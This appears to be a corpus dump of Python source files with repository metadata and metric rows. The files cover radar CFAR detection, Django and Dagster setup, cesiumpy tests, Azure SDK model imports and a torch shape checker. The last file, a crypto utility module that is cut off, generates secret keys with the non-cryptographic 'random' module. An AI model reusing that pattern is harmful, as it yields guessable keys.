| 36.65 | 98 | 0.527967 | 160 | 1,466 | 3 | 0.2625 | 0.025 | 0.095833 | 0.108333 | 0.204167 | 0.1625 | 0.1625 | 0.1625 | 0 | 0 | 0 | 0.019467 | 0.334243 | 1,466 | 39 | 99 | 37.589744 | 0.472336 | 0 | 0 | 0.289474 | 0 | 0 | 0.00955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d1340b77da734e63775de7b3f26a9ce848c63723 | 2,160 | py | Python | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | 7 | 2021-05-20T01:12:39.000Z | 2021-12-30T12:38:07.000Z | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | null | null | null | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_radardsp.ipynb (unless otherwise specified).
__all__ = ['cfar_nms', 'range_azimuth_ca_cfar']
# Cell
import numpy as np
from mmwave import dsp
# Cell
def cfar_nms(cfar_in, beamformed_ra, nhood_size=1):
"""non-maxumim suppression for cfar detections"""
def get_nhood(xx, yy):
return beamformed_ra[yy-nhood_size:yy+nhood_size+1, xx-nhood_size:xx+nhood_size+1]
nms_arr = np.zeros_like(cfar_in)
for yy, xx in zip(*np.where(cfar_in == 1)):
nms_arr[yy, xx] = 1 if np.all(beamformed_ra[yy, xx] >= get_nhood(xx, yy)) else 0
return nms_arr
def range_azimuth_ca_cfar(beamformed_radar_cube, nms=True):
"""Cell-Averaging CFAR on beamformed radar signal
inputs:
- `beamformed_radar_cube`
- `nms`: default `True` whether to perform non-maximum suppression
"""
range_az = np.abs(beamformed_radar_cube)
heatmap_log = np.log2(range_az)
first_pass, _ = np.apply_along_axis(func1d=dsp.cago_,
axis=0,
arr=heatmap_log,
l_bound=1.5,
guard_len=4,
noise_len=16)
# --- cfar in range direction
second_pass, noise_floor = np.apply_along_axis(func1d=dsp.caso_,
axis=0,
arr=heatmap_log.T,
l_bound=3,
guard_len=4,
noise_len=16)
# --- classify peaks and caclulate snrs
SKIP_SIZE = 4
noise_floor = noise_floor.T
first_pass = (heatmap_log > first_pass)
second_pass = (heatmap_log > second_pass.T)
peaks = (first_pass & second_pass)
peaks[:SKIP_SIZE, :] = 0
peaks[-SKIP_SIZE:, :] = 0
peaks[:, :SKIP_SIZE] = 0
peaks[:, -SKIP_SIZE:] = 0
peaks = peaks.astype('float32')
if nms:
peaks = peaks * cfar_nms(peaks, range_az, 1)
return peaks | 32.727273 | 95 | 0.539815 | 267 | 2,160 | 4.089888 | 0.359551 | 0.041209 | 0.047619 | 0.051282 | 0.169414 | 0.136447 | 0.055861 | 0.055861 | 0.055861 | 0.055861 | 0 | 0.021866 | 0.364815 | 2,160 | 66 | 96 | 32.727273 | 0.774052 | 0.17037 | 0 | 0.157895 | 1 | 0 | 0.020443 | 0.011925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0.131579 | 0.052632 | 0.026316 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d13bb185fb284c7a1c5cf8f8b572524463eee700 | 276 | py | Python | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | 1 | 2021-12-26T21:04:16.000Z | 2021-12-26T21:04:16.000Z | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | null | null | null | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | 1 | 2021-12-26T21:29:45.000Z | 2021-12-26T21:29:45.000Z | """
Module to register the Django application.
"""
from django.apps import AppConfig
class DuoUniversalAuthConfig(AppConfig):
"""
The specific AppConfig class to register for the Duo Universal
Authentication application.
"""
name = 'duo_universal_auth'
| 19.714286 | 66 | 0.728261 | 30 | 276 | 6.633333 | 0.633333 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195652 | 276 | 13 | 67 | 21.230769 | 0.896396 | 0.481884 | 0 | 0 | 0 | 0 | 0.155172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d142df79bef452231592066c73c02fa23e4fff32 | 398 | py | Python | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | #import numpy as np
#import pickle
#import sequence2vector as s2v_tools
#y_data_name = '/data/label_dataset.pkl'#
#Y = pickle.load(open(y_data_name, 'rb'))
#print(Y.shape)
#Y = s2v_tools.seq2vectorize(Y)
#print(Y)
from keras.models import Sequential
import plotresults as pltrslts
import pickle
network = pickle.load(open("/data/history.pkl", 'rb'))
pltrslts.plot_acc_loss(network, 'save')
| 18.090909 | 54 | 0.748744 | 61 | 398 | 4.737705 | 0.52459 | 0.083045 | 0.062284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.115578 | 398 | 21 | 55 | 18.952381 | 0.809659 | 0.494975 | 0 | 0 | 0 | 0 | 0.119792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d1484a9f3cc1c846f424f96a4602ea6fd126b3cd | 952 | py | Python | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 3 | 2019-02-07T18:03:56.000Z | 2020-06-30T11:09:50.000Z | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 13 | 2019-03-25T08:09:25.000Z | 2022-03-11T23:40:25.000Z | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 1 | 2019-07-26T10:23:37.000Z | 2019-07-26T10:23:37.000Z | from django.urls import resolve, reverse
from .base_classes import NetworkStationTest
from ..views import station_borehole_layer_add
class StationBoreholeLayerAddTests(NetworkStationTest):
    def __init__(self, *args):
        NetworkStationTest.__init__(
            self,
            *args,
            url="station_borehole_layer_add",
            arguments={"network_pk": "1", "station_pk": "1"}
        )

    def test_station_borehole_layer_add_view_status_code_authenticated(self):
        self.login_and_refresh()
        self.assertEquals(self.response.status_code, 200)

    def test_station_borehole_layer_add_view_status_code_anon(self):
        self.logout_and_refresh()
        self.assertEquals(self.response.status_code, 302)

    def test_station_borehole_layer_add_update_url_resolves_view(self):
        view = resolve("/networks/1/station/1/add-borehole-layer/")
        self.assertEquals(view.func, station_borehole_layer_add)
| 35.259259 | 77 | 0.726891 | 113 | 952 | 5.681416 | 0.380531 | 0.141745 | 0.186916 | 0.214953 | 0.333333 | 0.333333 | 0.286604 | 0.286604 | 0.137072 | 0 | 0 | 0.01292 | 0.186975 | 952 | 26 | 78 | 36.615385 | 0.816537 | 0 | 0 | 0 | 0 | 0 | 0.093487 | 0.070378 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.2 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d14a8262549a69bf5004e70bf2d22c44d9e1fbdd | 6,594 | py | Python | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 62 | 2015-12-30T04:17:25.000Z | 2022-02-09T04:26:24.000Z | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 20 | 2016-01-19T10:07:21.000Z | 2021-11-15T18:36:45.000Z | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 33 | 2016-02-03T13:28:29.000Z | 2022-02-26T13:14:41.000Z | #!/usr/bin/env python
# coding: utf-8
import nose
import unittest
import traitlets
import cesiumpy
import cesiumpy.testing as tm
class TestColor(unittest.TestCase):
    def test_maybe_color(self):
        blue = cesiumpy.color.Color.maybe('blue')
        self.assertEqual(repr(blue), "Color.BLUE")
        self.assertEqual(blue.script, "Cesium.Color.BLUE")
        red = cesiumpy.color.Color.maybe('RED')
        self.assertEqual(repr(red), "Color.RED")
        self.assertEqual(red.script, "Cesium.Color.RED")
        msg = "Unable to convert to Color instance: "
        with nose.tools.assert_raises_regexp(ValueError, msg):
            cesiumpy.color.Color.maybe('NamedColor')
        msg = "Unable to convert to Color instance: "
        with nose.tools.assert_raises_regexp(ValueError, msg):
            cesiumpy.color.Color.maybe('x')
        msg = "Unable to convert to Color instance: "
        with nose.tools.assert_raises_regexp(ValueError, msg):
            cesiumpy.color.Color.maybe(1)

    def test_maybe_color_listlike(self):
        # tuple
        c = cesiumpy.color.Color.maybe((0.5, 0.3, 0.5))
        self.assertEqual(repr(c), "Color(0.5, 0.3, 0.5)")
        self.assertEqual(c.script, "new Cesium.Color(0.5, 0.3, 0.5)")
        c = cesiumpy.color.Color.maybe((0.5, 0.3, 0.5, 0.2))
        self.assertEqual(repr(c), "Color(0.5, 0.3, 0.5, 0.2)")
        self.assertEqual(c.script, "new Cesium.Color(0.5, 0.3, 0.5, 0.2)")
        # do not convert
        msg = "Unable to convert to Color instance: "
        with nose.tools.assert_raises_regexp(ValueError, msg):
            cesiumpy.color.Color.maybe((0.5, 0.3))
        msg = "Unable to convert to Color instance: "
        with nose.tools.assert_raises_regexp(ValueError, msg):
            cesiumpy.color.Color.maybe((0.5, 0.3, 0.2, 0.1, 0.5))

    def test_named_colors(self):
        aqua = cesiumpy.color.AQUA
        exp = "Color.AQUA"
        self.assertEqual(repr(aqua), exp)
        self.assertEqual(aqua.name, 'AQUA')
        exp = "Cesium.Color.AQUA"
        self.assertEqual(aqua.script, exp)
        aqua = aqua.set_alpha(0.5)
        exp = "Color.AQUA.withAlpha(0.5)"
        self.assertEqual(repr(aqua), exp)
        self.assertEqual(aqua.name, 'AQUA')
        exp = "Cesium.Color.AQUA.withAlpha(0.5)"
        self.assertEqual(aqua.script, exp)
        # confirm set_alpha does not modify the constant
        aqua = cesiumpy.color.AQUA
        exp = "Color.AQUA"
        self.assertEqual(repr(aqua), exp)
        self.assertEqual(aqua.name, 'AQUA')
        exp = "Cesium.Color.AQUA"
        self.assertEqual(aqua.script, exp)
        blue = cesiumpy.color.BLUE
        exp = "Color.BLUE"
        self.assertEqual(repr(blue), exp)
        self.assertEqual(blue.name, 'BLUE')
        exp = "Cesium.Color.BLUE"
        self.assertEqual(blue.script, exp)

    def test_single_char_color(self):
        _m = cesiumpy.color.Color.maybe
        self.assertEqual(_m('b'), cesiumpy.color.BLUE)
        self.assertEqual(_m('g'), cesiumpy.color.GREEN)
        self.assertEqual(_m('r'), cesiumpy.color.RED)
        self.assertEqual(_m('c'), cesiumpy.color.CYAN)
        self.assertEqual(_m('m'), cesiumpy.color.MAGENTA)
        self.assertEqual(_m('y'), cesiumpy.color.YELLOW)
        self.assertEqual(_m('k'), cesiumpy.color.BLACK)
        self.assertEqual(_m('w'), cesiumpy.color.WHITE)
        self.assertEqual(_m('B'), cesiumpy.color.BLUE)
        self.assertEqual(_m('G'), cesiumpy.color.GREEN)
        self.assertEqual(_m('R'), cesiumpy.color.RED)
        self.assertEqual(_m('C'), cesiumpy.color.CYAN)
        self.assertEqual(_m('M'), cesiumpy.color.MAGENTA)
        self.assertEqual(_m('Y'), cesiumpy.color.YELLOW)
        self.assertEqual(_m('K'), cesiumpy.color.BLACK)
        self.assertEqual(_m('W'), cesiumpy.color.WHITE)

    def test_alpha(self):
        aqua = cesiumpy.color.AQUA
        res = aqua.set_alpha(0.3)
        exp = "Cesium.Color.AQUA.withAlpha(0.3)"
        self.assertEqual(res.script, exp)
        res = aqua.withAlpha(0.3)
        exp = "Cesium.Color.AQUA.withAlpha(0.3)"
        self.assertEqual(res.script, exp)
        res = aqua.withAlpha(1.0)
        exp = "Cesium.Color.AQUA.withAlpha(1.0)"
        self.assertEqual(res.script, exp)
        res = aqua.withAlpha(0.0)
        exp = "Cesium.Color.AQUA.withAlpha(0.0)"
        self.assertEqual(res.script, exp)
        msg = "The value of the 'alpha' trait of a ColorConstant instance should"
        with nose.tools.assert_raises_regexp(traitlets.TraitError, msg):
            aqua.withAlpha(1.1)

    def test_rgb(self):
        c = cesiumpy.color.Color(1, 0, 0)
        exp = "new Cesium.Color(1.0, 0.0, 0.0)"
        self.assertEqual(c.script, exp)
        c = cesiumpy.color.Color(1, 0, 0, 0.5)
        exp = "new Cesium.Color(1.0, 0.0, 0.0, 0.5)"
        self.assertEqual(c.script, exp)
        c = cesiumpy.color.Color.fromBytes(255, 0, 255)
        exp = "new Cesium.Color(1.0, 0.0, 1.0)"
        self.assertEqual(c.script, exp)
        c = cesiumpy.color.Color.fromBytes(255, 0, 255, 255)
        exp = "new Cesium.Color(1.0, 0.0, 1.0, 1.0)"
        self.assertEqual(c.script, exp)

    def test_color_string(self):
        c = cesiumpy.color.Color.fromString('#FF0000')
        exp = """Cesium.Color.fromCssColorString("#FF0000")"""
        self.assertEqual(c.script, exp)

    def test_random(self):
        c = cesiumpy.color.choice()
        self.assertIsInstance(c, cesiumpy.color.Color)
        colors = cesiumpy.color.sample(5)
        self.assertIsInstance(colors, list)
        self.assertEqual(len(colors), 5)
        self.assertTrue(all(isinstance(c, cesiumpy.color.Color) for c in colors))

    def test_cmap(self):
        tm._skip_if_no_matplotlib()
        import matplotlib.pyplot as plt
        mpl_cmap = plt.get_cmap('winter')
        cmap = cesiumpy.color.get_cmap('winter')
        exp = """ColorMap("winter")"""
        self.assertEqual(repr(cmap), exp)
        res = cmap(3)
        exp = mpl_cmap(3)
        self.assertEqual(res.red, exp[0])
        self.assertEqual(res.green, exp[1])
        self.assertEqual(res.blue, exp[2])
        self.assertEqual(res.alpha, exp[3])
        res = cmap([2, 4])
        exp = mpl_cmap([2, 4])
        for r, e in zip(res, exp):
            self.assertEqual(r.red, e[0])
            self.assertEqual(r.green, e[1])
            self.assertEqual(r.blue, e[2])
            self.assertEqual(r.alpha, e[3])

if __name__ == '__main__':
    nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
                   exit=False)
| 35.074468 | 81 | 0.607067 | 894 | 6,594 | 4.400447 | 0.144295 | 0.20971 | 0.077783 | 0.058465 | 0.63879 | 0.60727 | 0.559736 | 0.531774 | 0.524911 | 0.512964 | 0 | 0.031902 | 0.244161 | 6,594 | 187 | 82 | 35.262032 | 0.757424 | 0.014407 | 0 | 0.260563 | 0 | 0.021127 | 0.150139 | 0.034955 | 0 | 0 | 0 | 0 | 0.450704 | 1 | 0.06338 | false | 0 | 0.042254 | 0 | 0.112676 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d14d5d346317e2adeb5762d4720c2c3c5e7859a8 | 460 | py | Python | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 2 | 2021-06-21T17:50:26.000Z | 2021-06-21T19:14:23.000Z | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 7 | 2022-03-16T06:55:04.000Z | 2022-03-18T07:03:25.000Z | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 1 | 2021-08-18T17:21:57.000Z | 2021-08-18T17:21:57.000Z | from dagster import ModeDefinition, pipeline
from .database_resources import postgres_database, sqlite_database
from .solids_with_resources import generate_table_1, generate_table_2
@pipeline(
mode_defs=[
ModeDefinition("local_dev", resource_defs={"database": sqlite_database}),
ModeDefinition("prod", resource_defs={"database": postgres_database}),
],
)
def generate_tables_pipeline():
    generate_table_1()
    generate_table_2()
| 28.75 | 81 | 0.767391 | 52 | 460 | 6.384615 | 0.442308 | 0.156627 | 0.13253 | 0.13253 | 0.168675 | 0.168675 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.13913 | 460 | 15 | 82 | 30.666667 | 0.828283 | 0 | 0 | 0 | 1 | 0 | 0.063043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | true | 0 | 0.25 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d155115bca693ea9440a64b39244f42d954a8b6e | 5,153 | py | Python | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
    from ._models_py3 import AdmCredential
    from ._models_py3 import ApnsCredential
    from ._models_py3 import BaiduCredential
    from ._models_py3 import CheckAvailabilityParameters
    from ._models_py3 import CheckAvailabilityResult
    from ._models_py3 import DebugSendResponse
    from ._models_py3 import ErrorResponse
    from ._models_py3 import GcmCredential
    from ._models_py3 import MpnsCredential
    from ._models_py3 import NamespaceCreateOrUpdateParameters
    from ._models_py3 import NamespaceListResult
    from ._models_py3 import NamespacePatchParameters
    from ._models_py3 import NamespaceResource
    from ._models_py3 import NotificationHubCreateOrUpdateParameters
    from ._models_py3 import NotificationHubListResult
    from ._models_py3 import NotificationHubPatchParameters
    from ._models_py3 import NotificationHubResource
    from ._models_py3 import Operation
    from ._models_py3 import OperationDisplay
    from ._models_py3 import OperationListResult
    from ._models_py3 import PnsCredentialsResource
    from ._models_py3 import PolicykeyResource
    from ._models_py3 import Resource
    from ._models_py3 import ResourceListKeys
    from ._models_py3 import SharedAccessAuthorizationRuleCreateOrUpdateParameters
    from ._models_py3 import SharedAccessAuthorizationRuleListResult
    from ._models_py3 import SharedAccessAuthorizationRuleProperties
    from ._models_py3 import SharedAccessAuthorizationRuleResource
    from ._models_py3 import Sku
    from ._models_py3 import SubResource
    from ._models_py3 import WnsCredential
except (SyntaxError, ImportError):
    from ._models import AdmCredential  # type: ignore
    from ._models import ApnsCredential  # type: ignore
    from ._models import BaiduCredential  # type: ignore
    from ._models import CheckAvailabilityParameters  # type: ignore
    from ._models import CheckAvailabilityResult  # type: ignore
    from ._models import DebugSendResponse  # type: ignore
    from ._models import ErrorResponse  # type: ignore
    from ._models import GcmCredential  # type: ignore
    from ._models import MpnsCredential  # type: ignore
    from ._models import NamespaceCreateOrUpdateParameters  # type: ignore
    from ._models import NamespaceListResult  # type: ignore
    from ._models import NamespacePatchParameters  # type: ignore
    from ._models import NamespaceResource  # type: ignore
    from ._models import NotificationHubCreateOrUpdateParameters  # type: ignore
    from ._models import NotificationHubListResult  # type: ignore
    from ._models import NotificationHubPatchParameters  # type: ignore
    from ._models import NotificationHubResource  # type: ignore
    from ._models import Operation  # type: ignore
    from ._models import OperationDisplay  # type: ignore
    from ._models import OperationListResult  # type: ignore
    from ._models import PnsCredentialsResource  # type: ignore
    from ._models import PolicykeyResource  # type: ignore
    from ._models import Resource  # type: ignore
    from ._models import ResourceListKeys  # type: ignore
    from ._models import SharedAccessAuthorizationRuleCreateOrUpdateParameters  # type: ignore
    from ._models import SharedAccessAuthorizationRuleListResult  # type: ignore
    from ._models import SharedAccessAuthorizationRuleProperties  # type: ignore
    from ._models import SharedAccessAuthorizationRuleResource  # type: ignore
    from ._models import Sku  # type: ignore
    from ._models import SubResource  # type: ignore
    from ._models import WnsCredential  # type: ignore
from ._notification_hubs_management_client_enums import (
    AccessRights,
    NamespaceType,
    SkuName,
)
__all__ = [
    'AdmCredential',
    'ApnsCredential',
    'BaiduCredential',
    'CheckAvailabilityParameters',
    'CheckAvailabilityResult',
    'DebugSendResponse',
    'ErrorResponse',
    'GcmCredential',
    'MpnsCredential',
    'NamespaceCreateOrUpdateParameters',
    'NamespaceListResult',
    'NamespacePatchParameters',
    'NamespaceResource',
    'NotificationHubCreateOrUpdateParameters',
    'NotificationHubListResult',
    'NotificationHubPatchParameters',
    'NotificationHubResource',
    'Operation',
    'OperationDisplay',
    'OperationListResult',
    'PnsCredentialsResource',
    'PolicykeyResource',
    'Resource',
    'ResourceListKeys',
    'SharedAccessAuthorizationRuleCreateOrUpdateParameters',
    'SharedAccessAuthorizationRuleListResult',
    'SharedAccessAuthorizationRuleProperties',
    'SharedAccessAuthorizationRuleResource',
    'Sku',
    'SubResource',
    'WnsCredential',
    'AccessRights',
    'NamespaceType',
    'SkuName',
]
| 44.422414 | 94 | 0.751213 | 437 | 5,153 | 8.624714 | 0.203661 | 0.1645 | 0.106925 | 0.156275 | 0.206951 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007478 | 0.16961 | 5,153 | 115 | 95 | 44.808696 | 0.873335 | 0.165923 | 0 | 0 | 0 | 0 | 0.162714 | 0.097206 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.609524 | 0 | 0.609524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d1592de01ccfcfaa6800db9a077337ed4875fae8 | 1,723 | py | Python | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 17 | 2019-08-01T07:45:46.000Z | 2022-03-25T05:15:13.000Z | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 14 | 2020-05-30T16:18:28.000Z | 2021-06-24T08:08:19.000Z | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 6 | 2020-07-10T14:43:02.000Z | 2021-04-08T19:28:53.000Z | import functools
import typing
import torch
# equal to 1T
class _T(torch.Tensor):
    pass

class BY(torch.Tensor):
    pass

class T(torch.Tensor):
    pass

class B(torch.Tensor):
    pass

class S(torch.Tensor):
    pass

class BCT(torch.Tensor):
    pass

class CT(torch.Tensor):
    pass

class BCt(torch.Tensor):
    pass

class Bt(torch.Tensor):
    pass

class TBC(torch.Tensor):
    pass

class BT(torch.Tensor):
    pass

class BLY(torch.Tensor):
    pass

class BS(torch.Tensor):
    pass
def is_tensor_hint(cls):
    return issubclass(cls, torch.Tensor)

def unbind_tensor_hint(cls):
    dims = cls.__name__.split('.')[-1]
    return dims

def shapecheck(hints = None, auto = None, **kwargs):
    if auto is not None:
        def decorator(fn):
            @functools.wraps(fn)
            def wrapper(*args, **kwargs):
                shapecheck.hints = typing.get_type_hints(fn)
                if auto:
                    shapecheck(hints = {}, **kwargs)
                res = fn(*args, **kwargs)
                if auto:
                    shapecheck(hints = {}, **kwargs, **{'return' : res})
                shapecheck.hints = {}
                return res
            return wrapper
        return decorator
    else:
        hints = hints or shapecheck.hints
        dims = {}
        for k, v in kwargs.items():
            h = hints.get(k)
            if h is not None:
                if is_tensor_hint(h):
                    tensor_dims = unbind_tensor_hint(h)
                    assert v.ndim == len(tensor_dims), f'Tensor [{k}] should be typed [{tensor_dims}] and should have rank {len(tensor_dims)} but has rank [{v.ndim}]'
                    for i, d in enumerate(tensor_dims):
                        s = v.shape[i]
                        if d in dims:
                            assert dims[d] == s, f'Tensor [{k}] should be typed [{tensor_dims}], dim [{d}] should have rank [{dims[d]}] but has rank [{s}]'
                        dims[d] = s
                else:
                    assert isinstance(v, h), f'Arg [{k}] should be typed [{h}] but is typed [{type(v)}]'
| 20.270588 | 149 | 0.647707 | 266 | 1,723 | 4.116541 | 0.274436 | 0.140639 | 0.178082 | 0.219178 | 0.290411 | 0.241096 | 0.193607 | 0.193607 | 0.136986 | 0 | 0 | 0.001466 | 0.208358 | 1,723 | 84 | 150 | 20.511905 | 0.80132 | 0.006384 | 0 | 0.261538 | 0 | 0.030769 | 0.159064 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 1 | 0.076923 | false | 0.2 | 0.046154 | 0.015385 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d15d785d728aebc40b0768e439bd949eef225e9d | 1,867 | py | Python | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 20 | 2018-05-22T09:29:40.000Z | 2020-12-11T04:53:15.000Z | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 65 | 2019-03-07T02:43:06.000Z | 2021-01-07T03:43:52.000Z | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 6 | 2019-03-08T06:39:47.000Z | 2021-07-01T11:02:56.000Z | # coding: utf-8
"""
Qingmi's standard crypto functions and utilities.
"""
import hashlib
import hmac
import random
import time
import base64
def get_random_string(length=12,
allowed_chars='abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
""" 生成随机的字符串, 默认长度12个字符 """
return ''.join(random.choice(allowed_chars) for i in range(length))
def get_random_secret_key():
""" 生成一个50个字符组成的随机字符串作为SECRET_KEY的setting值 """
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
return get_random_string(50, chars)
def get_phone_verify_code(length=4):
""" 生成手机短信验证码 """
